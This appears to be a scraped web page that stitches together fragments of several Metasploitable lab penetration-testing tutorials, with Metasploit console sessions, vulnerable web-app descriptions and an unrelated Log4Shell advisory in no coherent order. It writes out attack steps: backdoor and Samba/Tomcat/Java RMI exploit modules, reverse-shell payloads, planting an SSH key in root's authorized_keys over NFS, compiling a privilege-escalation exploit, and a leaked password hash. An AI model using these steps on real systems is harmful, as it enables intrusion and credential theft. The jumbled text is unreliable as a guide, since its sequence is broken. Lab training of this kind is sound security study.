Name Current Setting Required Description We can read the passwords now and all the rest: root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid. Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1. It is a low privilege shell; however, we can progress to root through the udev exploit, as demonstrated later. Name Current Setting Required Description rapid7/metasploitable3 Wiki. [*] Accepted the first client connection RHOST yes The target address In the next tutorial we'll use Metasploit to scan and detect vulnerabilities on this Metasploitable VM. Attackers can execute arbitrary commands by defining a username that includes shell metacharacters. The first of these installed on Metasploitable2 is distccd. LPORT 4444 yes The listen port For hints & tips on exploiting the vulnerabilities there are also View Source and View Help buttons. We looked for netcat on the victim's command line, and luckily, it is installed: So we'll compile and send the exploit via netcat. We can now look into the databases and get whatever data we may like. Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques. Below is the homepage served from the web server on Metasploitable and accessed via Firefox on Kali Linux: Features of DVWA v1.0.7 accessible from the menu include: A More Info section is included on each of the vulnerability pages which contains links to additional resources about the vulnerability. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. This virtual machine (VM) is compatible with VMWare, VirtualBox, and other common virtualization platforms.
msf exploit(udev_netlink) > show options Proxies no Use a proxy chain ---- --------------- -------- ----------- The purpose of this video is to create a virtual networking environment to learn more about ethical hacking using the Metasploit framework available in Kali Linux. From a security perspective, anything labeled Java is expected to be interesting. nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572 We will do this by hacking FTP, telnet and SSH services. Mitigation: Update . msf auxiliary(telnet_version) > run Using this environment we will demonstrate a selection of exploits using a variety of tools from within Kali Linux against Metasploitable V2. [*] A is input [*] Accepted the first client connection Utilizing login / password combinations suggested by the USER_FILE, PASS_FILE and USERPASS_FILE options, this module tries to validate against a PostgreSQL instance. msf exploit(udev_netlink) > set SESSION 1 msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat A test environment provides a secure place to perform penetration testing and security research. In Cisco Prime LAN Management Solution, this vulnerability is reported to exist but may be present on any host that is not configured appropriately. DB_ALL_PASS false no Add all passwords in the current database to the list msf exploit(java_rmi_server) > show options Id Name CVEdetails.com is a free CVE security vulnerability database/information source. They are input on the add to your blog page. Name Current Setting Required Description :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead Stop the Apache Tomcat 8.0 Tomcat8 service. 0 Generic (Java Payload) A list that may be useful to readers who are studying for a certification exam or, more simply, to those who just want to have fun! So we got a low-privilege account. NOTE: Compatible payload sets differ on the basis of the target selected.
msf exploit(java_rmi_server) > exploit A malicious backdoor that was introduced to the VSFTPD download archive is exploited by this module. To transfer commands and data between processes, DRb uses remote method invocation (RMI). USERNAME => tomcat [*] Started reverse handler on 192.168.127.159:4444 First, from the terminal of your running Metasploitable2 VM, find its IP address. Reference: Linux IP command examples Second, from the terminal of your Kali VM, use nmap to scan for open network services in the Metasploitable2 VM. [*] Command: echo ZeiYbclsufvu4LGM; For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. Id Name CISA and its partners, through the Joint Cyber Defense Collaborative, are responding to active, widespread exploitation of a critical remote code execution (RCE) vulnerability (CVE-2021-44228) in Apache's Log4j software library, versions 2.0-beta9 to 2.14.1, known as "Log4Shell." Log4j is very broadly used in a variety of consumer and . TWiki is a flexible, powerful, secure, yet simple web-based collaboration platform. Target the IP address you found previously, and scan all ports (0-65535). [*] A is input [*] Reading from sockets . What is Nessus? ---- --------------- -------- ----------- Type help; or \h for help. ---- --------------- -------- ----------- SSLCert no Path to a custom SSL certificate (default is randomly generated) Login with the above credentials. This command displays the mount information for the NFS server. meterpreter > background Step 7: Display all tables in information_schema. There are the following kinds of vulnerabilities in Metasploitable 2: Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system. LHOST yes The listen address Backdoors - A few programs and services have been backdoored.
Exploit target: Payload options (java/meterpreter/reverse_tcp): [*] Writing to socket B [*] Accepted the second client connection msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true Getting started [*] A is input In addition to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible password security for both system and database server accounts. It aids penetration testers in choosing and configuring exploits. Proxies no Use a proxy chain It is freely available and can be extended individually, which makes it very versatile and flexible. msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 0 Automatic Metasploit Discover target information, find vulnerabilities, attack and validate weaknesses, and collect evidence. The two dashes then comment out the remaining password validation within the executed SQL statement. Type \c to clear the current input statement. ---- --------------- -------- ----------- Least significant byte first in each pixel. After you have downloaded the Metasploitable 2 file, you will need to unzip the file to see its contents. Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux, msf > use auxiliary/scanner/telnet/telnet_version In the online forums some people think this issue is due to a problem with Metasploit 6, whilst Metasploit 5 does not have this issue. So I'm going to exploit 7 different remote vulnerabilities; here is the list of vulnerabilities. The root directory is shared. CVE is a list of publicly disclosed cybersecurity vulnerabilities that is free to search, use, and incorporate into products and services, per the terms of use. DATABASE template1 yes The database to authenticate against To take advantage of this, make sure the "rsh-client" client is installed (on Ubuntu), and run the following command as your local root user.
So, let's set it up: mkdir /metafs # this will be the mount point, mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file: On port 21, Metasploitable2 runs vsftpd, a popular FTP server. ---- --------------- -------- ----------- This is the action page, SQL injection and XSS via the username, signature and password field, Contains directories that are supposed to be private, This page gives hints about how to discover the server configuration, Cascading style sheet injection and XSS via the color field, Denial of Service if you fill up the log. XSS via the hostname, client IP, browser HTTP header, Referer HTTP header, and date fields, XSS via the user agent string HTTP header. Within Metasploitable edit the following file via command: Next change the following line then save the file: In Kali Linux bring up the Mutillidae web application in the browser as before and click the Reset DB button to re-initialize the database. Redirect the results of the uname -r command into file uname.txt. CVE-2017-5231. RPORT 1099 yes The target port msf auxiliary(smb_version) > run With the udev exploit, we'll exploit the very same vulnerability, but from inside Metasploit this time: [+] Backdoor service has been spawned, handling Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Your identification has been saved in /root/.ssh/id_rsa. PASSWORD => tomcat Now we narrow our focus and use Metasploit to exploit the SSH vulnerabilities. [*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp Compatible Payloads The default login and password is msfadmin:msfadmin.
gcc root.c -o rootme (This will compile the C file to an executable binary) Step 12: Copy the compiled binary to the msfadmin directory in the NFS share. msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154 RPORT 139 yes The target port [+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.) [*] Auxiliary module execution completed, msf > use exploit/multi/samba/usermap_script RPORT 5432 yes The target port A Reset DB button in case the application gets damaged during attacks and the database needs reinitializing. This allows remote access to the host for convenience or remote administration. [*] B: "qcHh6jsH8rZghWdi\r\n" :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead. LHOST yes The listen address [*] Writing to socket A Enter the required details on the next screen and click Connect. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share. Learn ethical hacking, penetration testing, cyber security, best security and web penetration testing techniques from the best ethical hackers in the security field. (Note: A video tutorial on installing Metasploitable 2 is available here.) SRVHOST 0.0.0.0 yes The local host to listen on. Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). For example, noting that the version of PHP disclosed in the screenshot is version 5.2.4, it may be possible that the system is vulnerable to CVE-2012-1823 and CVE-2012-2311, which affected PHP before 5.3.12 and 5.4.x before 5.4.2. LHOST => 192.168.127.159 Inject the XSS on the register.php page. XSS via the username field, parameter pollution, GET for POST, XSS via the choice parameter, cross-site request forgery to force user choice.
RHOSTS yes The target address range or CIDR identifier After the virtual machine boots, login to the console with username msfadmin and password msfadmin. [*] Auxiliary module execution completed, msf > use exploit/unix/webapp/twiki_history A command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 is exploited by this module while using the non-default Username Map Script configuration option. RHOSTS yes The target address range or CIDR identifier -- ---- -- ---- msf 5> db_nmap -sV -p 80,22,110,25 192.168.94.134. First of all, open the Metasploit console in Kali. BLANK_PASSWORDS false no Try blank passwords for all users LHOST => 192.168.127.159 [*] Command: echo D0Yvs2n6TnTUDmPF; RPORT 3632 yes The target port The major purpose of such virtual machines is conducting security training, testing security tools, or simply practicing commonly known penetration testing techniques. Payload options (cmd/unix/interact): We're going to exploit it and get a shell: Due to a random number generator vulnerability, the OpenSSL software installed on the system is susceptible to a brute-force attack. Tip How to use Metasploit commands and exploits for pen tests These step-by-step instructions demonstrate how to use the Metasploit Framework for enterprise vulnerability and penetration testing. [*] Reading from socket B (Note: See a list with command ls /var/www.) URIPATH no The URI to use for this exploit (default is random) [*] Matching . [*] Writing to socket A However, this host has old versions of services, weak passwords and weak encryption. msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154 The compressed file is about 800 MB and can take a while to download over a slow connection. Step 5: Select your Virtual Machine and click the Setting button.
[*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP) Id Name 0 Linux x86 Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. RHOST yes The target address SQLi and XSS on the log are possible. GET for POST is possible because only reading POSTed variables is not enforced. root Step 2: Now extract the Metasploitable2.zip (downloaded virtual machine) into C:/Users/UserName/VirtualBox VMs/Metasploitable2. msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154 Upon a hit, you're going to see something like: After you find the key, you can use this to log in via ssh as root. Nessus, OpenVAS and Nexpose VS Metasploitable. There are a number of intentionally vulnerable web applications included with Metasploitable. LHOST => 192.168.127.159 THREADS 1 yes The number of concurrent threads The account root doesn't have a password. Name Current Setting Required Description If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH. In order to proceed, click on the Create button. [*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2021-02-06 23:03:13 +0300 We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet. [*] Undeploying RuoE02Uo7DeSsaVp7nmb79cq ---- --------------- -------- ----------- [*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2021-02-06 23:51:01 +0300 The main purpose of this vulnerable application is network testing. Accessing it is easy: In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature.
-- ---- msf exploit(twiki_history) > set payload cmd/unix/reverse Be sure your Kali VM is in "Host-only Network" before starting the scan, so you can communicate with your target Metasploitable VM. Need to report an Escalation or a Breach? Exploit target: Exploits include buffer overflow, code injection, and web application exploits. Loading of any arbitrary web page on the Internet or locally, including the site's password files. Phishing, SQL injection to dump all usernames and passwords via the username field or the password field, XSS via any of the displayed fields. Have you used Metasploitable to practice Penetration Testing? The version range is somewhere between 3 and 4. [*] Started reverse handler on 192.168.127.159:8888 To make this step easier, both Nessus and Rapid7 NexPose scanners are used to locate potential vulnerabilities for each service. RHOST yes The target address PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) [*] Uploading 13833 bytes as RuoE02Uo7DeSsaVp7nmb79cq.war Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. msf exploit(drb_remote_codeexec) > exploit Keywords vulnerabilities, penetration testing, Metasploit, Metasploitable 2, Metasploitable 3, pen-testing, exploits, Nmap, and Kali Linux Introduction Metasploitable 3 is an intentionally vulnerable Windows Server 2008R2 server, and it is a great way to learn about exploiting Windows operating systems using Metasploit. [*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:54381) at 2021-02-06 17:31:48 +0300 From the shell, run the ifconfig command to identify the IP address.